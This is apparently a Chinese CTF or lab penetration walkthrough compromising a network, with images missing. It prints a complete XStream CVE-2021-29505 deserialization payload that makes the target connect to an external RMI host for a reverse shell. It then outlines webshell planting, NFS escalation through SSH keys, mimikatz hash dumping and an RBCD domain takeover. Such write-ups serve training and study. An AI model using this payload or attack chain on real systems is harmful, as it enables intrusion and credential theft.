fscan扫一遍
img
有匿名登陆ftp,里面有两个文件,下载下来
img
看pom.xml,里面有xstream的依赖,根据版本可以找到对应的洞CVE-2021-29505
img
在自己vps上监听
img
传poc弹shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68
| POST /just_sumbit_it HTTP/1.1 Host: 39.99.145.25:8080 Content-Length: 3115 Accept: application/xml, text/xml, */*; q=0.01 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Content-Type: application/xml;charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7 Content-Type: application/xml Connection: close
<java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> </default> <int>3</int> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> <parsedMessage>true</parsedMessage> <soapVersion>SOAP_11</soapVersion> <bodyParts/> <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> <attachmentsInitialized>false</attachmentsInitialized> <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'> <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'> <names> <string>aa</string> <string>aa</string> </names> <ctx> <environment/> <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'> <java.rmi.server.RemoteObject> <string>UnicastRef</string> <string>60.204.245.37</string> <int>1099</int> <long>0</long> <int>0</int> <long>0</long> <short>0</short> <boolean>false</boolean> </java.rmi.server.RemoteObject> </registry> <host>60.204.245.37</host> <port>1099</port> </ctx> </candidates> </aliases> </nullIter> </sm> </message> </value> </javax.naming.ldap.Rdn_-RdnEntry> </java.util.PriorityQueue> </java.util.PriorityQueue>
|
img
img
传fscan扫内网,除本机外还有三台机器
img
搭建frp
img
img
看到有个mysql弱口令,navicat连上去看下。
查询一下日志,发现是phpstudy搭的
img
写个马进去
img
用蚁剑连接上拿flag
img
再看centos的机器,根据提示是NFS提权
现在flag1所在机器上写个ssh公钥进去
img
然后
1 2
| apt-get update apt-get install nfs-common
|
查看可用nfs exports
img
挂载
img
写入ssh公钥
img
ssh连上去
img
仍然需要提权才能读flag,但是可以看下hint给了个账号密码,这个是打flag3所在机器用的,但是我们已经打下来了(
img
尝试suid提权的时候发现开了ftp
img
回到第一台机器用python开一下ftp服务
img
在centos机器上把flag2传过去
img
img
接下来对最后一台机器进行攻击
前面已经用蚁剑连接上了flag3所在机器,先写个管理员用户进去
img
rdp连接,上传mimikatz抓取哈希
img
bloodhound收集一下域内信息
img
可以看到chenglei这个用户具有wtiredacl权限
img
打RBCD
创建一个机器账户TEST$
img
配置属性指向域控机器的账户
img
获取CIFS服务的ST
img
连上域控拿flag
img